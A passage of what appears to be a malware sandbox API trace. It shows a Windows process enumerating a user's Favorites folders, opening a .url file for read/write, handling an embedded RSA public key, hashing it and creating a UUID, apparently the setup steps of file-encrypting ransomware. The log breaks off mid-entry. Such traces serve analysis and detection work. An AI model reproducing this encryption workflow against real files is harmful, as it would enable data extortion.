0x2c6fdf8 [0189.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.331] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0189.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39138 [0189.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.332] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0189.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39138 | out: hHeap=0x6a0000) returned 1 [0189.332] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.332] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.333] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.333] PathFindFileNameW (pszPath="") returned="" [0189.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.333] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0189.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.335] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.335] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0189.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.335] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0189.335] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.337] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.337] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.339] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.339] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.341] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.341] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.341] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.341] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.341] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.341] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.343] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.343] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.343] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.343] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.343] GetLastError () returned 0x0 [0189.343] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.343] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.343] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.344] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.344] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.344] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39138 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39180 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39988 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39970 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.348] GetCurrentThreadId () returned 0x264 [0189.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43af0 [0189.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.349] GetCurrentThreadId () returned 0x264 [0189.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39988 [0189.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399e8 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a00 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399a0 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39970 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.353] HeapFree (in: hHeap=0x6a0000, 